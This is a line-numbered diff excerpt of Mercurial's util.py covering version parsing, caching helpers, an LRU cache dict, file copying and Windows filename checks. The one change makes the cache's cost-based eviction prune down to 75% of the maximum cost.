998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keywords args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 1220 self.cost = 0
1221 1221
1222 1222 def markempty(self):
1223 1223 """Mark the node as emptied."""
1224 1224 self.key = _notset
1225 1225 self.value = None
1226 1226 self.cost = 0
1227 1227
1228 1228 class lrucachedict(object):
1229 1229 """Dict that caches most recent accesses and sets.
1230 1230
1231 1231 The dict consists of an actual backing dict - indexed by original
1232 1232 key - and a doubly linked circular list defining the order of entries in
1233 1233 the cache.
1234 1234
1235 1235 The head node is the newest entry in the cache. If the cache is full,
1236 1236 we recycle head.prev and make it the new head. Cache accesses result in
1237 1237 the node being moved to before the existing head and being marked as the
1238 1238 new head node.
1239 1239
1240 1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 1241 simply an integer that is specified by the caller. The cache can be queried
1242 1242 for the total cost of all items presently in the cache.
1243 1243
1244 1244 The cache can also define a maximum cost. If a cache insertion would
1245 1245 cause the total cost of the cache to go beyond the maximum cost limit,
1246 1246 nodes will be evicted to make room for the new code. This can be used
1247 1247 to e.g. set a max memory limit and associate an estimated bytes size
1248 1248 cost to each item in the cache. By default, no maximum cost is enforced.
1249 1249 """
1250 1250 def __init__(self, max, maxcost=0):
1251 1251 self._cache = {}
1252 1252
1253 1253 self._head = head = _lrucachenode()
1254 1254 head.prev = head
1255 1255 head.next = head
1256 1256 self._size = 1
1257 1257 self.capacity = max
1258 1258 self.totalcost = 0
1259 1259 self.maxcost = maxcost
1260 1260
1261 1261 def __len__(self):
1262 1262 return len(self._cache)
1263 1263
1264 1264 def __contains__(self, k):
1265 1265 return k in self._cache
1266 1266
1267 1267 def __iter__(self):
1268 1268 # We don't have to iterate in cache order, but why not.
1269 1269 n = self._head
1270 1270 for i in range(len(self._cache)):
1271 1271 yield n.key
1272 1272 n = n.next
1273 1273
1274 1274 def __getitem__(self, k):
1275 1275 node = self._cache[k]
1276 1276 self._movetohead(node)
1277 1277 return node.value
1278 1278
1279 1279 def insert(self, k, v, cost=0):
1280 1280 """Insert a new item in the cache with optional cost value."""
1281 1281 node = self._cache.get(k)
1282 1282 # Replace existing value and mark as newest.
1283 1283 if node is not None:
1284 1284 self.totalcost -= node.cost
1285 1285 node.value = v
1286 1286 node.cost = cost
1287 1287 self.totalcost += cost
1288 1288 self._movetohead(node)
1289 1289
1290 1290 if self.maxcost:
1291 1291 self._enforcecostlimit()
1292 1292
1293 1293 return
1294 1294
1295 1295 if self._size < self.capacity:
1296 1296 node = self._addcapacity()
1297 1297 else:
1298 1298 # Grab the last/oldest item.
1299 1299 node = self._head.prev
1300 1300
1301 1301 # At capacity. Kill the old entry.
1302 1302 if node.key is not _notset:
1303 1303 self.totalcost -= node.cost
1304 1304 del self._cache[node.key]
1305 1305
1306 1306 node.key = k
1307 1307 node.value = v
1308 1308 node.cost = cost
1309 1309 self.totalcost += cost
1310 1310 self._cache[k] = node
1311 1311 # And mark it as newest entry. No need to adjust order since it
1312 1312 # is already self._head.prev.
1313 1313 self._head = node
1314 1314
1315 1315 if self.maxcost:
1316 1316 self._enforcecostlimit()
1317 1317
1318 1318 def __setitem__(self, k, v):
1319 1319 self.insert(k, v)
1320 1320
1321 1321 def __delitem__(self, k):
1322 1322 node = self._cache.pop(k)
1323 1323 self.totalcost -= node.cost
1324 1324 node.markempty()
1325 1325
1326 1326 # Temporarily mark as newest item before re-adjusting head to make
1327 1327 # this node the oldest item.
1328 1328 self._movetohead(node)
1329 1329 self._head = node.next
1330 1330
1331 1331 # Additional dict methods.
1332 1332
1333 1333 def get(self, k, default=None):
1334 1334 try:
1335 1335 return self._cache[k].value
1336 1336 except KeyError:
1337 1337 return default
1338 1338
1339 1339 def clear(self):
1340 1340 n = self._head
1341 1341 while n.key is not _notset:
1342 1342 self.totalcost -= n.cost
1343 1343 n.markempty()
1344 1344 n = n.next
1345 1345
1346 1346 self._cache.clear()
1347 1347
1348 1348 def copy(self, capacity=None, maxcost=0):
1349 1349 """Create a new cache as a copy of the current one.
1350 1350
1351 1351 By default, the new cache has the same capacity as the existing one.
1352 1352 But, the cache capacity can be changed as part of performing the
1353 1353 copy.
1354 1354
1355 1355 Items in the copy have an insertion/access order matching this
1356 1356 instance.
1357 1357 """
1358 1358
1359 1359 capacity = capacity or self.capacity
1360 1360 maxcost = maxcost or self.maxcost
1361 1361 result = lrucachedict(capacity, maxcost=maxcost)
1362 1362
1363 1363 # We copy entries by iterating in oldest-to-newest order so the copy
1364 1364 # has the correct ordering.
1365 1365
1366 1366 # Find the first non-empty entry.
1367 1367 n = self._head.prev
1368 1368 while n.key is _notset and n is not self._head:
1369 1369 n = n.prev
1370 1370
1371 1371 # We could potentially skip the first N items when decreasing capacity.
1372 1372 # But let's keep it simple unless it is a performance problem.
1373 1373 for i in range(len(self._cache)):
1374 1374 result.insert(n.key, n.value, cost=n.cost)
1375 1375 n = n.prev
1376 1376
1377 1377 return result
1378 1378
1379 1379 def popoldest(self):
1380 1380 """Remove the oldest item from the cache.
1381 1381
1382 1382 Returns the (key, value) describing the removed cache entry.
1383 1383 """
1384 1384 if not self._cache:
1385 1385 return
1386 1386
1387 1387 # Walk the linked list backwards starting at tail node until we hit
1388 1388 # a non-empty node.
1389 1389 n = self._head.prev
1390 1390 while n.key is _notset:
1391 1391 n = n.prev
1392 1392
1393 1393 key, value = n.key, n.value
1394 1394
1395 1395 # And remove it from the cache and mark it as empty.
1396 1396 del self._cache[n.key]
1397 1397 self.totalcost -= n.cost
1398 1398 n.markempty()
1399 1399
1400 1400 return key, value
1401 1401
1402 1402 def _movetohead(self, node):
1403 1403 """Mark a node as the newest, making it the new head.
1404 1404
1405 1405 When a node is accessed, it becomes the freshest entry in the LRU
1406 1406 list, which is denoted by self._head.
1407 1407
1408 1408 Visually, let's make ``N`` the new head node (* denotes head):
1409 1409
1410 1410 previous/oldest <-> head <-> next/next newest
1411 1411
1412 1412 ----<->--- A* ---<->-----
1413 1413 | |
1414 1414 E <-> D <-> N <-> C <-> B
1415 1415
1416 1416 To:
1417 1417
1418 1418 ----<->--- N* ---<->-----
1419 1419 | |
1420 1420 E <-> D <-> C <-> B <-> A
1421 1421
1422 1422 This requires the following moves:
1423 1423
1424 1424 C.next = D (node.prev.next = node.next)
1425 1425 D.prev = C (node.next.prev = node.prev)
1426 1426 E.next = N (head.prev.next = node)
1427 1427 N.prev = E (node.prev = head.prev)
1428 1428 N.next = A (node.next = head)
1429 1429 A.prev = N (head.prev = node)
1430 1430 """
1431 1431 head = self._head
1432 1432 # C.next = D
1433 1433 node.prev.next = node.next
1434 1434 # D.prev = C
1435 1435 node.next.prev = node.prev
1436 1436 # N.prev = E
1437 1437 node.prev = head.prev
1438 1438 # N.next = A
1439 1439 # It is tempting to do just "head" here, however if node is
1440 1440 # adjacent to head, this will do bad things.
1441 1441 node.next = head.prev.next
1442 1442 # E.next = N
1443 1443 node.next.prev = node
1444 1444 # A.prev = N
1445 1445 node.prev.next = node
1446 1446
1447 1447 self._head = node
1448 1448
1449 1449 def _addcapacity(self):
1450 1450 """Add a node to the circular linked list.
1451 1451
1452 1452 The new node is inserted before the head node.
1453 1453 """
1454 1454 head = self._head
1455 1455 node = _lrucachenode()
1456 1456 head.prev.next = node
1457 1457 node.prev = head.prev
1458 1458 node.next = head
1459 1459 head.prev = node
1460 1460 self._size += 1
1461 1461 return node
1462 1462
1463 1463 def _enforcecostlimit(self):
1464 1464 # This should run after an insertion. It should only be called if total
1465 1465 # cost limits are being enforced.
1466 1466 # The most recently inserted node is never evicted.
1467 1467 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 1468 return
1469 1469
1470 1470 # This is logically equivalent to calling popoldest() until we
1471 1471 # free up enough cost. We don't do that since popoldest() needs
1472 1472 # to walk the linked list and doing this in a loop would be
1473 1473 # quadratic. So we find the first non-empty node and then
1474 1474 # walk nodes until we free up enough capacity.
1475 #
1476 # If we only removed the minimum number of nodes to free enough
1477 # cost at insert time, chances are high that the next insert would
1478 # also require pruning. This would effectively constitute quadratic
1479 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # target cost that is a percentage of the max cost. This will tend
1481 # to free more nodes when the high water mark is reached, which
1482 # lowers the chances of needing to prune on the subsequent insert.
1483 targetcost = int(self.maxcost * 0.75)
1484
1475 1485 n = self._head.prev
1476 1486 while n.key is _notset:
1477 1487 n = n.prev
1478 1488
1479 while len(self) > 1 and self.totalcost > self.maxcost:
1489 while len(self) > 1 and self.totalcost > targetcost:
1480 1490 del self._cache[n.key]
1481 1491 self.totalcost -= n.cost
1482 1492 n.markempty()
1483 1493 n = n.prev
1484 1494
1485 1495 def lrucachefunc(func):
1486 1496 '''cache most recent results of function calls'''
1487 1497 cache = {}
1488 1498 order = collections.deque()
1489 1499 if func.__code__.co_argcount == 1:
1490 1500 def f(arg):
1491 1501 if arg not in cache:
1492 1502 if len(cache) > 20:
1493 1503 del cache[order.popleft()]
1494 1504 cache[arg] = func(arg)
1495 1505 else:
1496 1506 order.remove(arg)
1497 1507 order.append(arg)
1498 1508 return cache[arg]
1499 1509 else:
1500 1510 def f(*args):
1501 1511 if args not in cache:
1502 1512 if len(cache) > 20:
1503 1513 del cache[order.popleft()]
1504 1514 cache[args] = func(*args)
1505 1515 else:
1506 1516 order.remove(args)
1507 1517 order.append(args)
1508 1518 return cache[args]
1509 1519
1510 1520 return f
1511 1521
1512 1522 class propertycache(object):
1513 1523 def __init__(self, func):
1514 1524 self.func = func
1515 1525 self.name = func.__name__
1516 1526 def __get__(self, obj, type=None):
1517 1527 result = self.func(obj)
1518 1528 self.cachevalue(obj, result)
1519 1529 return result
1520 1530
1521 1531 def cachevalue(self, obj, value):
1522 1532 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1523 1533 obj.__dict__[self.name] = value
1524 1534
1525 1535 def clearcachedproperty(obj, prop):
1526 1536 '''clear a cached property value, if one has been set'''
1527 1537 if prop in obj.__dict__:
1528 1538 del obj.__dict__[prop]
1529 1539
1530 1540 def increasingchunks(source, min=1024, max=65536):
1531 1541 '''return no less than min bytes per chunk while data remains,
1532 1542 doubling min after each chunk until it reaches max'''
1533 1543 def log2(x):
1534 1544 if not x:
1535 1545 return 0
1536 1546 i = 0
1537 1547 while x:
1538 1548 x >>= 1
1539 1549 i += 1
1540 1550 return i - 1
1541 1551
1542 1552 buf = []
1543 1553 blen = 0
1544 1554 for chunk in source:
1545 1555 buf.append(chunk)
1546 1556 blen += len(chunk)
1547 1557 if blen >= min:
1548 1558 if min < max:
1549 1559 min = min << 1
1550 1560 nmin = 1 << log2(blen)
1551 1561 if nmin > min:
1552 1562 min = nmin
1553 1563 if min > max:
1554 1564 min = max
1555 1565 yield ''.join(buf)
1556 1566 blen = 0
1557 1567 buf = []
1558 1568 if buf:
1559 1569 yield ''.join(buf)
1560 1570
1561 1571 def always(fn):
1562 1572 return True
1563 1573
1564 1574 def never(fn):
1565 1575 return False
1566 1576
1567 1577 def nogc(func):
1568 1578 """disable garbage collector
1569 1579
1570 1580 Python's garbage collector triggers a GC each time a certain number of
1571 1581 container objects (the number being defined by gc.get_threshold()) are
1572 1582 allocated even when marked not to be tracked by the collector. Tracking has
1573 1583 no effect on when GCs are triggered, only on what objects the GC looks
1574 1584 into. As a workaround, disable GC while building complex (huge)
1575 1585 containers.
1576 1586
1577 1587 This garbage collector issue have been fixed in 2.7. But it still affect
1578 1588 CPython's performance.
1579 1589 """
1580 1590 def wrapper(*args, **kwargs):
1581 1591 gcenabled = gc.isenabled()
1582 1592 gc.disable()
1583 1593 try:
1584 1594 return func(*args, **kwargs)
1585 1595 finally:
1586 1596 if gcenabled:
1587 1597 gc.enable()
1588 1598 return wrapper
1589 1599
1590 1600 if pycompat.ispypy:
1591 1601 # PyPy runs slower with gc disabled
1592 1602 nogc = lambda x: x
1593 1603
1594 1604 def pathto(root, n1, n2):
1595 1605 '''return the relative path from one place to another.
1596 1606 root should use os.sep to separate directories
1597 1607 n1 should use os.sep to separate directories
1598 1608 n2 should use "/" to separate directories
1599 1609 returns an os.sep-separated path.
1600 1610
1601 1611 If n1 is a relative path, it's assumed it's
1602 1612 relative to root.
1603 1613 n2 should always be relative to root.
1604 1614 '''
1605 1615 if not n1:
1606 1616 return localpath(n2)
1607 1617 if os.path.isabs(n1):
1608 1618 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1609 1619 return os.path.join(root, localpath(n2))
1610 1620 n2 = '/'.join((pconvert(root), n2))
1611 1621 a, b = splitpath(n1), n2.split('/')
1612 1622 a.reverse()
1613 1623 b.reverse()
1614 1624 while a and b and a[-1] == b[-1]:
1615 1625 a.pop()
1616 1626 b.pop()
1617 1627 b.reverse()
1618 1628 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1619 1629
1620 1630 # the location of data files matching the source code
1621 1631 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1622 1632 # executable version (py2exe) doesn't support __file__
1623 1633 datapath = os.path.dirname(pycompat.sysexecutable)
1624 1634 else:
1625 1635 datapath = os.path.dirname(pycompat.fsencode(__file__))
1626 1636
1627 1637 i18n.setdatapath(datapath)
1628 1638
1629 1639 def checksignature(func):
1630 1640 '''wrap a function with code to check for calling errors'''
1631 1641 def check(*args, **kwargs):
1632 1642 try:
1633 1643 return func(*args, **kwargs)
1634 1644 except TypeError:
1635 1645 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1636 1646 raise error.SignatureError
1637 1647 raise
1638 1648
1639 1649 return check
1640 1650
1641 1651 # a whilelist of known filesystems where hardlink works reliably
1642 1652 _hardlinkfswhitelist = {
1643 1653 'apfs',
1644 1654 'btrfs',
1645 1655 'ext2',
1646 1656 'ext3',
1647 1657 'ext4',
1648 1658 'hfs',
1649 1659 'jfs',
1650 1660 'NTFS',
1651 1661 'reiserfs',
1652 1662 'tmpfs',
1653 1663 'ufs',
1654 1664 'xfs',
1655 1665 'zfs',
1656 1666 }
1657 1667
1658 1668 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1659 1669 '''copy a file, preserving mode and optionally other stat info like
1660 1670 atime/mtime
1661 1671
1662 1672 checkambig argument is used with filestat, and is useful only if
1663 1673 destination file is guarded by any lock (e.g. repo.lock or
1664 1674 repo.wlock).
1665 1675
1666 1676 copystat and checkambig should be exclusive.
1667 1677 '''
1668 1678 assert not (copystat and checkambig)
1669 1679 oldstat = None
1670 1680 if os.path.lexists(dest):
1671 1681 if checkambig:
1672 1682 oldstat = checkambig and filestat.frompath(dest)
1673 1683 unlink(dest)
1674 1684 if hardlink:
1675 1685 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1676 1686 # unless we are confident that dest is on a whitelisted filesystem.
1677 1687 try:
1678 1688 fstype = getfstype(os.path.dirname(dest))
1679 1689 except OSError:
1680 1690 fstype = None
1681 1691 if fstype not in _hardlinkfswhitelist:
1682 1692 hardlink = False
1683 1693 if hardlink:
1684 1694 try:
1685 1695 oslink(src, dest)
1686 1696 return
1687 1697 except (IOError, OSError):
1688 1698 pass # fall back to normal copy
1689 1699 if os.path.islink(src):
1690 1700 os.symlink(os.readlink(src), dest)
1691 1701 # copytime is ignored for symlinks, but in general copytime isn't needed
1692 1702 # for them anyway
1693 1703 else:
1694 1704 try:
1695 1705 shutil.copyfile(src, dest)
1696 1706 if copystat:
1697 1707 # copystat also copies mode
1698 1708 shutil.copystat(src, dest)
1699 1709 else:
1700 1710 shutil.copymode(src, dest)
1701 1711 if oldstat and oldstat.stat:
1702 1712 newstat = filestat.frompath(dest)
1703 1713 if newstat.isambig(oldstat):
1704 1714 # stat of copied file is ambiguous to original one
1705 1715 advanced = (
1706 1716 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1707 1717 os.utime(dest, (advanced, advanced))
1708 1718 except shutil.Error as inst:
1709 1719 raise error.Abort(str(inst))
1710 1720
1711 1721 def copyfiles(src, dst, hardlink=None, progress=None):
1712 1722 """Copy a directory tree using hardlinks if possible."""
1713 1723 num = 0
1714 1724
1715 1725 def settopic():
1716 1726 if progress:
1717 1727 progress.topic = _('linking') if hardlink else _('copying')
1718 1728
1719 1729 if os.path.isdir(src):
1720 1730 if hardlink is None:
1721 1731 hardlink = (os.stat(src).st_dev ==
1722 1732 os.stat(os.path.dirname(dst)).st_dev)
1723 1733 settopic()
1724 1734 os.mkdir(dst)
1725 1735 for name, kind in listdir(src):
1726 1736 srcname = os.path.join(src, name)
1727 1737 dstname = os.path.join(dst, name)
1728 1738 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1729 1739 num += n
1730 1740 else:
1731 1741 if hardlink is None:
1732 1742 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1733 1743 os.stat(os.path.dirname(dst)).st_dev)
1734 1744 settopic()
1735 1745
1736 1746 if hardlink:
1737 1747 try:
1738 1748 oslink(src, dst)
1739 1749 except (IOError, OSError):
1740 1750 hardlink = False
1741 1751 shutil.copy(src, dst)
1742 1752 else:
1743 1753 shutil.copy(src, dst)
1744 1754 num += 1
1745 1755 if progress:
1746 1756 progress.increment()
1747 1757
1748 1758 return hardlink, num
1749 1759
1750 1760 _winreservednames = {
1751 1761 'con', 'prn', 'aux', 'nul',
1752 1762 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1753 1763 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1754 1764 }
1755 1765 _winreservedchars = ':*?"<>|'
1756 1766 def checkwinfilename(path):
1757 1767 r'''Check that the base-relative path is a valid filename on Windows.
1758 1768 Returns None if the path is ok, or a UI string describing the problem.
1759 1769
1760 1770 >>> checkwinfilename(b"just/a/normal/path")
1761 1771 >>> checkwinfilename(b"foo/bar/con.xml")
1762 1772 "filename contains 'con', which is reserved on Windows"
1763 1773 >>> checkwinfilename(b"foo/con.xml/bar")
1764 1774 "filename contains 'con', which is reserved on Windows"
1765 1775 >>> checkwinfilename(b"foo/bar/xml.con")
1766 1776 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1767 1777 "filename contains 'AUX', which is reserved on Windows"
1768 1778 >>> checkwinfilename(b"foo/bar/bla:.txt")
1769 1779 "filename contains ':', which is reserved on Windows"
1770 1780 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1771 1781 "filename contains '\\x07', which is invalid on Windows"
1772 1782 >>> checkwinfilename(b"foo/bar/bla ")
1773 1783 "filename ends with ' ', which is not allowed on Windows"
1774 1784 >>> checkwinfilename(b"../bar")
1775 1785 >>> checkwinfilename(b"foo\\")
1776 1786 "filename ends with '\\', which is invalid on Windows"
1777 1787 >>> checkwinfilename(b"foo\\/bar")
1778 1788 "directory name ends with '\\', which is invalid on Windows"
1779 1789 '''
1780 1790 if path.endswith('\\'):
1781 1791 return _("filename ends with '\\', which is invalid on Windows")
1782 1792 if '\\/' in path:
1783 1793 return _("directory name ends with '\\', which is invalid on Windows")
1784 1794 for n in path.replace('\\', '/').split('/'):
1785 1795 if not n:
1786 1796 continue
1787 1797 for c in _filenamebytestr(n):
1788 1798 if c in _winreservedchars:
1789 1799 return _("filename contains '%s', which is reserved "
1790 1800 "on Windows") % c
1791 1801 if ord(c) <= 31:
1792 1802 return _("filename contains '%s', which is invalid "
1793 1803 "on Windows") % stringutil.escapestr(c)
1794 1804 base = n.split('.')[0]
1795 1805 if base and base.lower() in _winreservednames:
1796 1806 return _("filename contains '%s', which is reserved "
1797 1807 "on Windows") % base
1798 1808 t = n[-1:]
1799 1809 if t in '. ' and n not in '..':
1800 1810 return _("filename ends with '%s', which is not allowed "
1801 1811 "on Windows") % t
1802 1812
1803 1813 if pycompat.iswindows:
1804 1814 checkosfilename = checkwinfilename
1805 1815 timer = time.clock
1806 1816 else:
1807 1817 checkosfilename = platform.checkosfilename
1808 1818 timer = time.time
1809 1819
1810 1820 if safehasattr(time, "perf_counter"):
1811 1821 timer = time.perf_counter
1812 1822
1813 1823 def makelock(info, pathname):
1814 1824 """Create a lock file atomically if possible
1815 1825
1816 1826 This may leave a stale lock file if symlink isn't supported and signal
1817 1827 interrupt is enabled.
1818 1828 """
1819 1829 try:
1820 1830 return os.symlink(info, pathname)
1821 1831 except OSError as why:
1822 1832 if why.errno == errno.EEXIST:
1823 1833 raise
1824 1834 except AttributeError: # no symlink in os
1825 1835 pass
1826 1836
1827 1837 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1828 1838 ld = os.open(pathname, flags)
1829 1839 os.write(ld, info)
1830 1840 os.close(ld)
1831 1841
1832 1842 def readlock(pathname):
1833 1843 try:
1834 1844 return os.readlink(pathname)
1835 1845 except OSError as why:
1836 1846 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1837 1847 raise
1838 1848 except AttributeError: # no symlink in os
1839 1849 pass
1840 1850 fp = posixfile(pathname, 'rb')
1841 1851 r = fp.read()
1842 1852 fp.close()
1843 1853 return r
1844 1854
1845 1855 def fstat(fp):
1846 1856 '''stat file object that may not have fileno method.'''
1847 1857 try:
1848 1858 return os.fstat(fp.fileno())
1849 1859 except AttributeError:
1850 1860 return os.stat(fp.name)
1851 1861
1852 1862 # File system features
1853 1863
1854 1864 def fscasesensitive(path):
1855 1865 """
1856 1866 Return true if the given path is on a case-sensitive filesystem
1857 1867
1858 1868 Requires a path (like /foo/.hg) ending with a foldable final
1859 1869 directory component.
1860 1870 """
1861 1871 s1 = os.lstat(path)
1862 1872 d, b = os.path.split(path)
1863 1873 b2 = b.upper()
1864 1874 if b == b2:
1865 1875 b2 = b.lower()
1866 1876 if b == b2:
1867 1877 return True # no evidence against case sensitivity
1868 1878 p2 = os.path.join(d, b2)
1869 1879 try:
1870 1880 s2 = os.lstat(p2)
1871 1881 if s2 == s1:
1872 1882 return False
1873 1883 return True
1874 1884 except OSError:
1875 1885 return True
1876 1886
1877 1887 try:
1878 1888 import re2
1879 1889 _re2 = None
1880 1890 except ImportError:
1881 1891 _re2 = False
1882 1892
1883 1893 class _re(object):
1884 1894 def _checkre2(self):
1885 1895 global _re2
1886 1896 try:
1887 1897 # check if match works, see issue3964
1888 1898 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1889 1899 except ImportError:
1890 1900 _re2 = False
1891 1901
1892 1902 def compile(self, pat, flags=0):
1893 1903 '''Compile a regular expression, using re2 if possible
1894 1904
1895 1905 For best performance, use only re2-compatible regexp features. The
1896 1906 only flags from the re module that are re2-compatible are
1897 1907 IGNORECASE and MULTILINE.'''
1898 1908 if _re2 is None:
1899 1909 self._checkre2()
1900 1910 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1901 1911 if flags & remod.IGNORECASE:
1902 1912 pat = '(?i)' + pat
1903 1913 if flags & remod.MULTILINE:
1904 1914 pat = '(?m)' + pat
1905 1915 try:
1906 1916 return re2.compile(pat)
1907 1917 except re2.error:
1908 1918 pass
1909 1919 return remod.compile(pat, flags)
1910 1920
1911 1921 @propertycache
1912 1922 def escape(self):
